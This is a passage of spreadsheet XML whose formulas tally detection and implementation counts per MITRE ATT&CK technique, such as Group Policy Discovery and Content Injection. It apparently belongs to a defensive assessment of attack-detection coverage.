        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>4</v>
      </c>
      <c r="AX74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>4</v>
      </c>
      <c r="AY74" s="322" t="str">
        <f t="shared" si="22"/>
        <v>4 (4)</v>
      </c>
      <c r="AZ74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA74" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>4</v>
      </c>
      <c r="BC74" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>277</v>
      </c>
      <c r="BD74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>81</v>
      </c>
      <c r="BE74" s="4" t="str">
        <f t="shared" si="23"/>
        <v>81 (277)</v>
      </c>
      <c r="BF74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>12</v>
      </c>
      <c r="BG74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>37</v>
      </c>
      <c r="BI74" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>49</v>
      </c>
      <c r="BJ74" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>33</v>
      </c>
      <c r="BK74" s="322" t="str">
        <f t="shared" si="24"/>
        <v>33 (49)</v>
      </c>
      <c r="BL74" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>3</v>
      </c>
      <c r="BM74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>30</v>
      </c>
      <c r="BO74" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>192</v>
      </c>
      <c r="BP74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>176</v>
      </c>
      <c r="BQ74" s="4" t="str">
        <f t="shared" si="25"/>
        <v>176 (192)</v>
      </c>
      <c r="BR74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>3</v>
      </c>
      <c r="BS74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>8</v>
      </c>
      <c r="BT74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>153</v>
      </c>
      <c r="BV74" s="292">
        <v>45</v>
      </c>
      <c r="BW74" s="322">
        <v>40</v>
      </c>
      <c r="BX74" s="4" t="str">
        <f t="shared" si="26"/>
        <v>40 (45)</v>
      </c>
      <c r="BY74" s="12">
        <v>9</v>
      </c>
      <c r="BZ74" s="13">
        <v>1</v>
      </c>
      <c r="CA74" s="394">
        <v>20</v>
      </c>
      <c r="CB74" s="288">
        <v>90</v>
      </c>
      <c r="CC74" s="4">
        <v>67</v>
      </c>
      <c r="CD74" s="4" t="str">
        <f t="shared" si="27"/>
        <v>67 (90)</v>
      </c>
      <c r="CE74" s="4">
        <v>9</v>
      </c>
      <c r="CF74" s="4">
        <v>5</v>
      </c>
      <c r="CG74" s="13">
        <v>1</v>
      </c>
      <c r="CH74" s="394">
        <v>20</v>
      </c>
    </row>
    <row r="75" spans="1:98" ht="15" customHeight="1">
      <c r="A75" s="4">
        <f t="shared" si="28"/>
        <v>73</v>
      </c>
      <c r="B75" s="4" t="str">
        <f>IFERROR(VLOOKUP(A75,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1615</v>
      </c>
      <c r="C75" s="4" t="str">
        <f>IFERROR(VLOOKUP(B75,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Group Policy Discovery</v>
      </c>
      <c r="D75" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B75)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>53</v>
      </c>
      <c r="F75" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (53)</v>
      </c>
      <c r="G75" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>39</v>
      </c>
      <c r="H75" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>39</v>
      </c>
      <c r="I75" s="322" t="str">
        <f t="shared" si="15"/>
        <v>39 (39)</v>
      </c>
      <c r="J75" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>39</v>
      </c>
      <c r="M75" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N75" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O75" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P75" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S75" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>39</v>
      </c>
      <c r="T75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>39</v>
      </c>
      <c r="U75" s="4" t="str">
        <f t="shared" si="17"/>
        <v>39 (39)</v>
      </c>
      <c r="V75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>39</v>
      </c>
      <c r="Y75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>39</v>
      </c>
      <c r="Z75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>39</v>
      </c>
      <c r="AA75" s="322" t="str">
        <f t="shared" si="18"/>
        <v>39 (39)</v>
      </c>
      <c r="AB75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC75" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>39</v>
      </c>
      <c r="AE75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>10</v>
      </c>
      <c r="AF75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>10</v>
      </c>
      <c r="AG75" s="322" t="str">
        <f t="shared" si="19"/>
        <v>10 (10)</v>
      </c>
      <c r="AH75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI75" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>5</v>
      </c>
      <c r="AK75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>49</v>
      </c>
      <c r="AL75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>49</v>
      </c>
      <c r="AM75" s="322" t="str">
        <f t="shared" si="20"/>
        <v>49 (49)</v>
      </c>
      <c r="AN75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>3</v>
      </c>
      <c r="AO75" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>43</v>
      </c>
      <c r="AQ75" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR75" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS75" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT75" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY75" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ75" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA75" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC75" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>39</v>
      </c>
      <c r="BD75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>39</v>
      </c>
      <c r="BE75" s="4" t="str">
        <f t="shared" si="23"/>
        <v>39 (39)</v>
      </c>
      <c r="BF75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>39</v>
      </c>
      <c r="BI75" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ75" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK75" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL75" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO75" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>49</v>
      </c>
      <c r="BP75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>49</v>
      </c>
      <c r="BQ75" s="4" t="str">
        <f t="shared" si="25"/>
        <v>49 (49)</v>
      </c>
      <c r="BR75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS75" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>6</v>
      </c>
      <c r="BT75" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU75" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B75,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>49</v>
      </c>
      <c r="BV75" s="292">
        <v>0</v>
      </c>
      <c r="BW75" s="322">
        <v>0</v>
      </c>
      <c r="BX75" s="4" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY75" s="12">
        <v>0</v>
      </c>
      <c r="BZ75" s="13">
        <v>0</v>
      </c>
      <c r="CA75" s="394">
        <v>0</v>
      </c>
      <c r="CB75" s="288">
        <v>0</v>
      </c>
      <c r="CC75" s="4">
        <v>0</v>
      </c>
      <c r="CD75" s="4" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE75" s="4">
        <v>0</v>
      </c>
      <c r="CF75" s="4">
        <v>0</v>
      </c>
      <c r="CG75" s="13">
        <v>0</v>
      </c>
      <c r="CH75" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:98" ht="15" customHeight="1">
      <c r="A76" s="4">
        <f t="shared" si="28"/>
        <v>74</v>
      </c>
      <c r="B76" s="4" t="str">
        <f>IFERROR(VLOOKUP(A76,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1659</v>
      </c>
      <c r="C76" s="4" t="str">
        <f>IFERROR(VLOOKUP(B76,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Content Injection</v>
      </c>
      <c r="D76" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B76)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>89</v>
      </c>
      <c r="F76" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (89)</v>
      </c>
      <c r="G76" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H76" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I76" s="322" t="str">
        <f t="shared" si="15"/>
        <v>2 (2)</v>
      </c>
      <c r="J76" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M76" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>3</v>
      </c>
      <c r="N76" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>3</v>
      </c>
      <c r="O76" s="322" t="str">
        <f t="shared" si="16"/>
        <v>3 (3)</v>
      </c>
      <c r="P76" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S76" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>5</v>
      </c>
      <c r="T76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>5</v>
      </c>
      <c r="U76" s="4" t="str">
        <f t="shared" si="17"/>
        <v>5 (5)</v>
      </c>
      <c r="V76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W76" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>3</v>
      </c>
      <c r="Y76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>17</v>
      </c>
      <c r="Z76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>13</v>
      </c>
      <c r="AA76" s="322" t="str">
        <f t="shared" si="18"/>
        <v>13 (17)</v>
      </c>
      <c r="AB76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC76" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>9</v>
      </c>
      <c r="AE76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>62</v>
      </c>
      <c r="AF76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>25</v>
      </c>
      <c r="AG76" s="322" t="str">
        <f t="shared" si="19"/>
        <v>25 (62)</v>
      </c>
      <c r="AH76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>11</v>
      </c>
      <c r="AI76" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>18</v>
      </c>
      <c r="AK76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>79</v>
      </c>
      <c r="AL76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>38</v>
      </c>
      <c r="AM76" s="322" t="str">
        <f t="shared" si="20"/>
        <v>38 (79)</v>
      </c>
      <c r="AN76" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>21</v>
      </c>
      <c r="AO76" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP76" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>24</v>
      </c>
      <c r="AQ76" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR76" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS76" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
